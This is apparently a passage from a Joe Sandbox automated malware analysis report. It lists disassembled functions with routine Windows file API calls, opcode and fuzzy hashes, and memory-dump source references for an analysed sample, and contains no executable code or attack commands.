                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog$CloseFind
                                      • String ID:
                                      • API String ID: 2506663941-0
                                      • Opcode ID: 8d65ac3519d01e3be96b3310cffaf16b4b0bdec655d4f978f78218078b679992
                                      • Instruction ID: 29f70c7eb36f4f46be9d62fcaa1a38d3d9b77f857fbe97fe868011f3096e4566
                                      • Opcode Fuzzy Hash: 8d65ac3519d01e3be96b3310cffaf16b4b0bdec655d4f978f78218078b679992
                                      • Instruction Fuzzy Hash: 0E41D67190465C9ADB24DB61CC55AFAB7B8BF00304F0404EFE68A9B193EB795EC5CB14
                                      Function 004F98E0 Relevance: 1.6, APIs: 1, Instructions: 111fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?), ref: 004F995F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 5412c677dcef89f09f75c0e10d4e4857467c0c29dbe7f27b8927da4f9b4c2c37
                                      • Instruction ID: 8f7bd85ff98b864e771884a19fa1a85c48e39e37c4e908ac6803e13c149085cf
                                      • Opcode Fuzzy Hash: 5412c677dcef89f09f75c0e10d4e4857467c0c29dbe7f27b8927da4f9b4c2c37
                                      • Instruction Fuzzy Hash: 603116705447496FE7309F24CC49FABBB94BB45320F110B1EF6A1963D0D3E86945CB99
                                      Function 004F9F7A Relevance: 1.6, APIs: 1, Instructions: 111fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000001,?,?,?,?,004FD343,00000001,?,?,?), ref: 004FA011
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 7e68c5a30d0a54c90b5c03c96ea56ad6d9ae7b4d12813bc5e7884053fd38c203
                                      • Instruction ID: 5dabb2474d6097961b80cdc8d57ccc8b35173957cd9f0e5c6be9348a6e5f5ebb
                                      • Opcode Fuzzy Hash: 7e68c5a30d0a54c90b5c03c96ea56ad6d9ae7b4d12813bc5e7884053fd38c203
                                      • Instruction Fuzzy Hash: 4E319F7120430AAFDB14CF20E808B7B77A5EF85715F04451AFA4597290CB79AD49CBAB
                                      Function 004F13DC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F13E1
                                        • Part of subcall function 004F5E37: __EH_prolog.LIBCMT ref: 004F5E3C
                                        • Part of subcall function 004FCE40: __EH_prolog.LIBCMT ref: 004FCE45
                                        • Part of subcall function 004FB505: __EH_prolog.LIBCMT ref: 004FB50A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 4c8bbac55e4eb30ebd29f10c4a29c662fcaa07b4c6f139129cde258e88ee26f8
                                      • Instruction ID: 427012404594487d924b92dc062d21b6aadd4cb010fca87f543c95ad17955eec
                                      • Opcode Fuzzy Hash: 4c8bbac55e4eb30ebd29f10c4a29c662fcaa07b4c6f139129cde258e88ee26f8
                                      • Instruction Fuzzy Hash: 15415AB0905B45DEE724CF798885AE6FBE5BF19300F50492ED6EE83282CB356654CB14
                                      Function 04AE66F1 Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 04AE66FE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID: ExitProcessUser
                                      • String ID:
                                      • API String ID: 3902816426-0
                                      • Opcode ID: c13d47f5b818de5c079a47d1a53d6c0f52e474b0f7b98cdfaf7771f56f4ec1b1
                                      • Instruction ID: c6d7284c92f9356b7ac6318589f4760fd4de1b7db6e56b813457eb58efda2957
                                      • Opcode Fuzzy Hash: c13d47f5b818de5c079a47d1a53d6c0f52e474b0f7b98cdfaf7771f56f4ec1b1
                                      • Instruction Fuzzy Hash: 533128B2D1060CEFDB00DFD5C848BEEBBB8FB58336F20461AE421A6180D7785A048F60
                                      Function 0050B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0050B098
                                        • Part of subcall function 004F13DC: __EH_prolog.LIBCMT ref: 004F13E1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: c56d3613a20df67d8e904d47e453e41e4370bc63b1a7c4e43b29e596c4c19f30
                                      • Instruction ID: 8bc1dba61dd58066f5f013f4983f03c648ffe130a704bb68a574ee20a934039c
                                      • Opcode Fuzzy Hash: c56d3613a20df67d8e904d47e453e41e4370bc63b1a7c4e43b29e596c4c19f30
                                      • Instruction Fuzzy Hash: CC316C75800249DAEB15DF65C9919FEBBB4BF09304F10449EE409B7292D779AE04CB61
                                      Function 004F9DA2 Relevance: 1.6, APIs: 1, Instructions: 83timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 004F9E70
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FileTime
                                      • String ID:
                                      • API String ID: 1425588814-0
                                      • Opcode ID: 4733a6c1c568a16c2cac273798cac508c63cd16c5271ed8971f0c5358d24b936
                                      • Instruction ID: 1e73a8a0e289972e0f52e461f8d18969667d5331d9cda157369eb99c78efde3e
                                      • Opcode Fuzzy Hash: 4733a6c1c568a16c2cac273798cac508c63cd16c5271ed8971f0c5358d24b936
                                      • Instruction Fuzzy Hash: EA21EE3124824AABC714CF24C895BBBBBE8AF91304F08481EF5C583681D32CED0D9B66
                                      Function 004F966E Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,004F9F27,?,?,004F771A), ref: 004F96E6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: cd69b7cd98fb795f2aed40c813986189a4f61ed8065cd51b05eae9083e8dd2cf
                                      • Instruction ID: 212d84b40ef7b5f41d04a28be7bdb69c1c8a18a6086eade3f498f84cf9543e71
                                      • Opcode Fuzzy Hash: cd69b7cd98fb795f2aed40c813986189a4f61ed8065cd51b05eae9083e8dd2cf
                                      • Instruction Fuzzy Hash: 1C21CF71500348AFF3309A65CC89BB7B7DCEB59324F100A1AFA95C26D1C778AC859675
                                      Function 004F9785 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNELBASE(?,?,00000000,?,00000000,-00000858,?,-00000858,00000000,004F9C22,?,?,00000000,00000800,?), ref: 004F97AD
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: d3db1b3f438a0addc07b7d1fdfa33f9f069dbe3cbfcf9342c0900bc4df8e4780
                                      • Instruction ID: d68e8fba5b0b35b81e7c518f74338e0d2a6dbabacd68883947ae922537c599cd
                                      • Opcode Fuzzy Hash: d3db1b3f438a0addc07b7d1fdfa33f9f069dbe3cbfcf9342c0900bc4df8e4780
                                      • Instruction Fuzzy Hash: CA11733052430CEBDF317F65C804B7A77A9BF52360F10852BE61685290D77C9E459B69
                                      Function 004F9E80 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 004F9EC7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 07a864422fc8469d9c84b3d04c934ff593aa9f368c9e07112ac956eb19e2a87f
                                      • Instruction ID: 3789062f2375de9b7d3e59a588ac5cd07908aaec767293aa92c15aea8b4516d8
                                      • Opcode Fuzzy Hash: 07a864422fc8469d9c84b3d04c934ff593aa9f368c9e07112ac956eb19e2a87f
                                      • Instruction Fuzzy Hash: 3111E930600708ABD734DA34C884BB7B7E9AB45360F50462BE253D26E0D778ED4AC765
                                      Function 004FA2B2 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004FC27E: _wcslen.LIBCMT ref: 004FC284
                                      • CreateDirectoryW.KERNELBASE(00000001,00000000,00000001,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA2D9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CreateDirectory_wcslen
                                      • String ID:
                                      • API String ID: 2011010700-0
                                      • Opcode ID: 043ea383643c7fc64dcf49c3426958091a1c82bb3122d52b81d0997678006205
                                      • Instruction ID: f84004a67f16cc771003a7321e877caf84efe4a135354a20dac1244216bbd36c
                                      • Opcode Fuzzy Hash: 043ea383643c7fc64dcf49c3426958091a1c82bb3122d52b81d0997678006205
                                      • Instruction Fuzzy Hash: F401F9B560021C59EF219B718C49BFF3388DF0A384F04045AFF05D2281D75CCA9196BB
                                      Function 004F9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 196cf4c9fbe8361e1332c00d65ea1b3b502572aae60fcaba21b1dd7aec47eb47
                                      • Instruction ID: 289006923ffadc4fded75789038adf43ccbbcb2ee68d8f7b260febc18449ad34
                                      • Opcode Fuzzy Hash: 196cf4c9fbe8361e1332c00d65ea1b3b502572aae60fcaba21b1dd7aec47eb47
                                      • Instruction Fuzzy Hash: 1001A933D0052CABCF11AB69CD81AEEB776BF88744F01455AEA15B7252DA38CD04C6A4
                                      Function 00518E54 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: d9c1e6196fba87a6d7bbd317fc0d882392e48c4979dd883479385fd89a728a83
                                      • Instruction ID: e4809763359cb7292af7deed3c8f4080231f19a0176cbcea32f6f414a3dcdf7d
                                      • Opcode Fuzzy Hash: d9c1e6196fba87a6d7bbd317fc0d882392e48c4979dd883479385fd89a728a83
                                      • Instruction Fuzzy Hash: 4DF0C23260120666FB312A25AC08BFF3F5CBFD2B70F244725F914AA191DF618DC091A1
                                      Function 004F5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F5AC2
                                        • Part of subcall function 004FB505: __EH_prolog.LIBCMT ref: 004FB50A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 8f225010b7a989f0733cd35c0ef67725b14e4a55be322a05e7be793bc04fc007
                                      • Instruction ID: 5ccb9c1258cd341e383a42eafbb83a4fb9e0496f548165e29825fc0026b22d41
                                      • Opcode Fuzzy Hash: 8f225010b7a989f0733cd35c0ef67725b14e4a55be322a05e7be793bc04fc007
                                      • Instruction Fuzzy Hash: 8E01DC70808695DAD724EBB8C0097EDFBE4EFA4308F50848EA456532C2CBB51B08D7A2
                                      Function 004F9620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,004F95D6,00000000,Function_00032641,000000FF), ref: 004F963B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
